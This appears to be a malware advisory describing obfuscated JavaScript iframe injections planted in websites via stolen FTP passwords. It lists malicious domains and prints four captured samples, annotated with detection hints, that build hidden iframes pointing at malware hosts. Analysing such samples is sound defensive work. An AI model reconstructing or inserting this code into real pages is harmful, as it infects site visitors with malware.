Description
JavaScript that is encoded and hidden inside an HTML or PHP page. It creates an iframe, hidden from the end user, that is used to distribute malware. In some cases the code is placed inside the <body onload> attribute,
and in others it appears as a plain JavaScript entry.
Domains Used
94.63.240.145
sausagesments.com
zirycatum.com
numudozaf.com
http://cubyfonizi.com/k985ytv.htm
Affecting
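Any web site. It uses stolen FTP passwords to compromise the site (similar to Gumblar). Because the entry point is a stolen credential, removing the injected code without also changing the FTP passwords leaves the site open to reinfection.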
Clean up
Request support here (or sign up here).
Malware dump
<!--
  Captured sample, abbreviated: the "...." in the middle stands for code that is not shown.
  The visible part assigns short string fragments to throwaway variables (one of them is '94.',
  consistent with the IP address listed under "Domains Used"), sets an attribute on an element
  held in `ch`, and appends that element to document.body. It also blanks window.status;
  presumably this keeps the load out of the status bar (the elided part would confirm).
  NOTE(review): the quote characters are typographic rather than ASCII, so they appear to have
  been converted when the page was published. Normalise them before using this text as a
  byte-exact match pattern.
-->
<body onload = "status=’’;xj=’5.p’;w=’dz’;q=’.’;vz=’94.’;....;ch.setAttribute(hg,y);document.body.appendChild(ch);window.status=status;"/>
<!--
  Captured sample: the payload sits in the onload attribute of the body tag.
  How to read it:
    - every literal is split into one to three character fragments held in throwaway variables,
      so neither the tag name nor the URL appears as a contiguous string in the file;
    - `dd` is joined from 'if' + 'ra' + 'me' and `i` from 'sr' + 'c', i.e. the element type and
      the attribute being set are "iframe" and "src";
    - `jn` is the joined URL; its host is one of the entries listed under "Domains Used";
    - the element is created 5 by 5 with style "display:none" and appended to document.body,
      so nothing is rendered for the visitor.
  Detection hint: a createElement call whose argument is built with concat(), followed by
  setAttribute with a concat-built name and appendChild, is the recurring shape here. The
  variable names differ in every sample, so they are not useful as indicators.
-->
<body onload="j=’7’;yy=’le’;jp=’b’;p=’if’;l=’sa’;sb=’1c’;x=’tp’;ih=’a’;he=’7’;yq=’us’;y=’/i’;b=’ht’;u=’a’;v=’p=3’;ea=’://‘;xh=’0fc’;d=’7’;c=’s’;e=’p?t’;xn=’/ho’;n=’n’;k=’s.’;ds=’sr’;q=’c’;h=’t’;o=’9’;fc=’dex’;tn=’17’;bg=’.ph’;an=’com’;hj=’ra’;mp=’f’;cw=’a’;fw=’me’;z=’me’;zf=’n’;vn=’ge’;dd=p.concat(hj,fw);i=ds.concat(q);jn=b.concat(x,ea,l,yq,u,vn,c,z,n,h,k,an,xn,yy,y,zf,fc,bg,e,v,mp,jp,d,ih,xh,sb,tn,o,j,cw,he);var mu=document.createElement(dd);mu.setAttribute(‘width’,’5’);mu.setAttribute(‘height’,’5’);mu.setAttribute(‘style’,’display:none’);mu.setAttribute(i,jn);document.body.appendChild(mu);">
<!--
  Captured sample: two script elements injected back to back on one line, the "plain
  JavaScript entry" form from the description. Both follow the same pattern:
    - "iframe" is joined from 'ifr' + 'ame' and "src" from two fragments ('s' + 'rc' in the
      first script, 'sr' + 'c' in the second);
    - the URL is joined from many short fragments; the two hosts are among the entries listed
      under "Domains Used";
    - the iframe is created 1 by 1 with frameBorder 0 and appended to document.body.
  Unlike the onload samples, no "display:none" style is set here; the frame is kept out of
  sight only by its size and missing border.
  NOTE(review): the first assignment opens with a typographic quote and closes with an ASCII
  double quote, so the text as published is not valid JavaScript. This looks like an artefact
  of the page's quote conversion; confirm against an original capture before relying on it.
-->
<script>ti=’.c";ai=’af’;qo=’p’;jn=’htm’;rf=’n’;tf=’doz’;yn=’ifr’;xm=’s’;cl=’o’;jd=’k9’;nn=’tv.’;rl=’85y’;r=’umu’;eh=’m/‘;ec=’htt’;sb=’rc’;f=’ame’;l=’://‘;b=yn.concat(f);gg=xm.concat(sb);qt=ec.concat(qo,l,rf,r,tf,ai,ti,cl,eh,jd,rl,nn,jn);var xp=document.createElement(b);xp.setAttribute(‘width’,’1’);xp.setAttribute(‘height’,’1’);xp.frameBorder=0;xp.setAttribute(gg,qt);document.body.appendChild(xp);</script><script>wa=’t’;p=’ht’;f=’k98’;tb=’ame’;bg=’.’;v=’sr’;g=’tp:’;vf=’/z’;bs=’t’;px=’v.h’;br=’yt’;k=’c’;yr=’m’;ds=’m’;ej=’/‘;au=’/‘;t=’com’;sp=’ifr’;r=’ca’;cp=’y’;wz=’ir’;wf=’u’;b=’5’;se=sp.concat(tb);oz=v.concat(k);db=p.concat(g,ej,vf,wz,cp,r,bs,wf,yr,bg,t,au,f,b,br,px,wa,ds);var ip=document.createElement(se);ip.setAttribute(‘width’,’1’);ip.setAttribute(‘height’,’1’);ip.frameBorder=0;ip.setAttribute(oz,db);document.body.appendChild(ip);</script>
<!--
  Captured sample: a single script element with the same structure as the other script
  samples on this page.
    - `bc` is joined from 'ifr' + 'ame' ("iframe") and `x` from 'sr' + 'c' ("src");
    - `p` is the joined URL, which matches the full URL given under "Domains Used";
    - the iframe is created 1 by 1 with frameBorder 0 and appended to document.body.
  The fragment boundaries and variable names are different from the other samples even though
  the resulting structure is the same, so a match on the literal text of one sample will not
  find the others. Matching on the structure (concat-built tag name passed to createElement,
  then a tiny frame appended to the body) is more durable.
-->
<script>ez="://";la="k9";vp=’85y’;ma=’zi.’;s=’c’;f=’m’;kg=’cub’;i=’t’;zz=’/‘;l=’sr’;n=’c’;ng=’ame’;rv=’.ht’;gn=’om’;h=’ht’;tg=’v’;vl=’tp’;kf=’ni’;v=’ifr’;vq=’yfo’;bc=v.concat(ng);x=l.concat(n);p=h.concat(vl,ez,kg,vq,kf,ma,s,gn,zz,la,vp,i,tg,rv,f);var jc=document.createElement(bc);jc.setAttribute(‘width’,’1’);jc.setAttribute(‘height’,’1’);jc.frameBorder=0;jc.setAttribute(x,p);document.body.appendChild(jc);</script>